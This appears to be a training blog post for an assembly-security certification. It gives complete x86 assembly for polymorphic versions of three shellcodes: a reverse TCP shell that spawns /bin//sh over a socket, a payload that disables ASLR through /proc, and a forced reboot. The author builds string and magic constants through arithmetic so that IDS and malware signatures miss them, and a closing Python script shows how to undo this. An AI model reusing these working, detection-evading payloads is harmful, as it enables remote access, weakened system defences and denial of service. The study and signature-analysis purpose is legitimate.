SLAE Assignment #6 – Create polymorphic versions of 3 different shellcodes from shell-storm

Github link to files

For this assignment I chose three existing shellcodes and used some simple techniques to make polymorphic versions of them.

  1. Shell Reverse TCP by Julien Ahrens
  2. Linux x86 ASLR Deactivation by Jean Pascal Pereira
  3. Linux Hard Reboot by gunslinger

Shell Reverse TCP (polymorphic version)

Original size:  74 bytes
Polymorphic version:  90 bytes

global _start
section .text
    _start:
        push 0x66               ; eax = 0x66 (socketcall)
        pop eax
        push 0x1                ; ebx = 1 (SYS_SOCKET)
        pop ebx
        xor edx, edx
        push edx                ; protocol = 0
        push ebx                ; type = SOCK_STREAM
        push 0x2                ; domain = AF_INET
        mov ecx, esp            ; ecx -> argument array
        int 0x80                ; socket()
        xchg edx, eax           ; edx = socket fd, eax = 0
        mov al, 0x66            ; socketcall again
        push 0x101017f          ; sin_addr = 127.1.1.1
        push word 0x3905        ; sin_port = 1337 (network byte order)
        inc ebx                 ; ebx = 2
        push bx                 ; sin_family = AF_INET
        mov ecx, esp            ; ecx -> sockaddr_in
        push 0x10               ; addrlen = 16
        push ecx                ; &sockaddr_in
        push edx                ; socket fd
        mov ecx, esp            ; ecx -> argument array
        inc ebx                 ; ebx = 3 (SYS_CONNECT)
        int 0x80                ; connect()
        push 0x2
        pop ecx                 ; ecx = 2
        xchg edx, ebx           ; ebx = socket fd
     loop:
        mov al, 0x3f            ; dup2(fd, ecx)
        int 0x80
        dec ecx
        jns loop                ; repeat for 2, 1, 0
        mov al, 0xb             ; execve
        inc ecx                 ; ecx = 0 (argv = NULL)
        mov edx, ecx            ; envp = NULL
        push edx                ; string terminator
        mov esi, 0x3B9ACA01
        mov ebx, 0xA40DF930
        sub ebx, esi            ; 0xA40DF930 - 0x3B9ACA01 = 0x68732F2F ("//sh")
        push ebx
        mov esi, 0x3B9ACA04
        mov ebx, 0xAA042C33
        sub ebx, esi            ; 0xAA042C33 - 0x3B9ACA04 = 0x6E69622F ("/bin")
        push ebx
        mov ebx, esp            ; ebx -> "/bin//sh"
        int 0x80                ; execve("/bin//sh", NULL, NULL)

Instead of pushing the literal string bytes onto the stack (a pattern that an IDS or malware scanner can fingerprint), the values are derived at run time as the result of a SUB instruction and only then pushed.

Linux x86 ASLR Deactivation

Original size:  83 bytes
Polymorphic version:  104 bytes

global _start
section .text
    _start:
        xor eax, eax
        push eax                ; NUL terminator
        mov eax, 0x65636170     ; "pace"
        push eax
        add eax, 0x1F0D1117
        sub eax, 0x11111111     ; eax = 0x735F6176 ("va_s")
        push eax
        sub eax, 0x13F9E70D     ; eax = 0x5F657A69 ("ize_")
        push eax
        add eax, 0xE09EA05      ; eax = 0x6D6F646E ("ndom")
        push eax
        sub eax, 0xBFD3502      ; eax = 0x61722F6C ("l/ra")
        push eax
        add eax, 0x3FC42F9      ; eax = 0x656E7265 ("erne")
        push eax
        add eax, 0x5C10114      ; eax = 0x6B2F7379 ("ys/k")
        push eax
        add eax, 0x7FFEFF6      ; eax = 0x732F636F ("oc/s")
        push eax
        sub eax, 0x11D04551
        add eax, 0x11111111     ; eax = 0x72702F2F ("//pr")
        push eax
        mov ebx, esp            ; ebx -> "//proc/sys/kernel/randomize_va_space"
        mov cx, 0x2bc           ; mode (low 16 bits of ecx)
        xor eax, eax
        mov al, 0x8             ; creat()
        int 0x80
        mov ebx, eax            ; ebx = fd
        push eax
        mov dx, 0x3a30
        push dx                 ; "0:" on the stack
        mov ecx, esp            ; ecx -> "0"
        xor edx, edx
        inc edx                 ; count = 1
        mov al, 0x4             ; write(fd, "0", 1)
        int 0x80
        mov al, 0x6             ; close(fd)
        int 0x80
        inc eax                 ; close returned 0, so eax = 1: exit()
        int 0x80

I used a technique similar to the one in the previous shellcode, but here I used a combination of ADD and SUB instructions to keep changing the value in the EAX register, and whenever the running result equalled the next four bytes of the shellcode string, I added a PUSH instruction.

Linux Hard Reboot

Original size:  33 bytes
Polymorphic version:  45 bytes

global _start
section .text
    _start:
        mov al, 0x24            ; sync(); eax is not zeroed here, so its upper bytes must already be 0
        int 0x80
        xor eax, eax
        mov al, 0x58            ; reboot()
        mov ebx, 0xdeadbeef
        xor ebx, 0x204C6042     ; ebx = 0xFEE1DEAD (LINUX_REBOOT_MAGIC1)
        mov ecx, 0x14256783
        add ecx, 0x13ECB1E6     ; ecx = 0x28121969 (LINUX_REBOOT_MAGIC2)
        mov edx, 0x1234567      ; LINUX_REBOOT_CMD_RESTART
        int 0x80
        xor eax, eax
        mov al, 0x1             ; exit()
        xor ebx, ebx
        int 0x80

For the polymorphic version of this shellcode, I used a combination of XOR and ADD instructions to get the values in the EBX and ECX registers that were needed without writing the values directly.

The value needed in the EBX register is 0xfee1dead.  To get that value, I wrote 0xdeadbeef to EBX, and then XOR’ed it with 0x204c6042.

The value needed in the ECX register is 0x28121969.  To achieve that value I wrote 0x14256783 to ECX and then added 0x13ecb1e6 to it.
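All three transformations above rely on one idiom: a constant is never written literally, it is the result of 32-bit MOV/ADD/SUB/XOR arithmetic, and only the result is pushed or handed to the syscall. An analyst, or a signature engine, undoes this by folding the constants. The Python script below is an added example (my own code, not part of the original post or of the shell-storm shellcodes) that does exactly that: it models only mov, add, sub, xor and push on the 32-bit general registers with wraparound, runs over the constant-building fragments copied from the three listings, and recovers the plain values: "/bin//sh", the randomize_va_space path, and the reboot magic numbers. The function names and the fragment constants are mine.

```python
import re
import struct

MASK = 0xFFFFFFFF
REGS32 = ("eax", "ebx", "ecx", "edx", "esi", "edi")
# Only the instructions that make up the constant-building idiom are modeled.
_INSN = re.compile(r"^(mov|add|sub|xor|push)\s+(\w+)(?:\s*,\s*(\w+))?$")

def _operand(token, regs):
    """Resolve a 32-bit register name or an immediate (0x.. or decimal)."""
    if token in regs:
        return regs[token]
    try:
        return int(token, 0) & MASK
    except ValueError:
        raise NotImplementedError("operand not modeled: " + token)

def fold_constants(asm):
    """Emulate a mov/add/sub/xor/push chain with 32-bit wraparound and return
    (final registers, dwords pushed in push order). Labels, int 0x80 and other
    instructions are ignored, so feed it the constant-building fragment only."""
    regs = dict.fromkeys(REGS32, 0)
    pushes = []
    for raw in asm.splitlines():
        m = _INSN.match(raw.split(";", 1)[0].strip())
        if not m:
            continue
        op, dst, src = m.groups()
        if op == "push":
            pushes.append(_operand(dst, regs))
            continue
        if dst not in regs:
            raise NotImplementedError("register not modeled: " + dst)
        val = _operand(src, regs)
        if op == "mov":
            regs[dst] = val
        elif op == "add":
            regs[dst] = (regs[dst] + val) & MASK
        elif op == "sub":
            regs[dst] = (regs[dst] - val) & MASK
        else:  # xor
            regs[dst] ^= val
    return regs, pushes

def stack_bytes(pushes):
    """Memory image the pushes leave behind (what ESP points at afterwards):
    last push at the lowest address, each dword little-endian."""
    return b"".join(struct.pack("<I", v) for v in reversed(pushes))

def recover_cstring(pushes):
    """The NUL-terminated string spelled out by the pushed dwords."""
    return stack_bytes(pushes).split(b"\x00", 1)[0]

# Fragments copied from the three listings above (constant-building parts only).
REVERSE_TCP_PATH = """
    push edx
    mov esi, 0x3B9ACA01
    mov ebx, 0xA40DF930
    sub ebx, esi
    push ebx
    mov esi, 0x3B9ACA04
    mov ebx, 0xAA042C33
    sub ebx, esi
    push ebx
"""
ASLR_PROC_PATH = """
    xor eax, eax
    push eax
    mov eax, 0x65636170
    push eax
    add eax, 0x1F0D1117
    sub eax, 0x11111111
    push eax
    sub eax, 0x13F9E70D
    push eax
    add eax, 0xE09EA05
    push eax
    sub eax, 0xBFD3502
    push eax
    add eax, 0x3FC42F9
    push eax
    add eax, 0x5C10114
    push eax
    add eax, 0x7FFEFF6
    push eax
    sub eax, 0x11D04551
    add eax, 0x11111111
    push eax
"""
REBOOT_MAGIC = """
    mov ebx, 0xdeadbeef
    xor ebx, 0x204C6042
    mov ecx, 0x14256783
    add ecx, 0x13ECB1E6
    mov edx, 0x1234567
"""

if __name__ == "__main__":
    print(recover_cstring(fold_constants(REVERSE_TCP_PATH)[1]))  # b'/bin//sh'
    print(recover_cstring(fold_constants(ASLR_PROC_PATH)[1]))    # b'//proc/sys/kernel/randomize_va_space'
    regs = fold_constants(REBOOT_MAGIC)[0]
    print(hex(regs["ebx"]), hex(regs["ecx"]), hex(regs["edx"]))  # 0xfee1dead 0x28121969 0x1234567
```

The emulator deliberately refuses (with NotImplementedError) anything it does not model, such as 16-bit pushes or partial registers, instead of silently skipping it, so a wrong stack layout cannot be produced without notice. Folding the arithmetic also shows why this kind of polymorphism is cheap to defeat: the immediates change, but the values that reach the kernel (and a signature written on syscall arguments rather than on the byte pattern) do not.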

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID:  SLAE-860
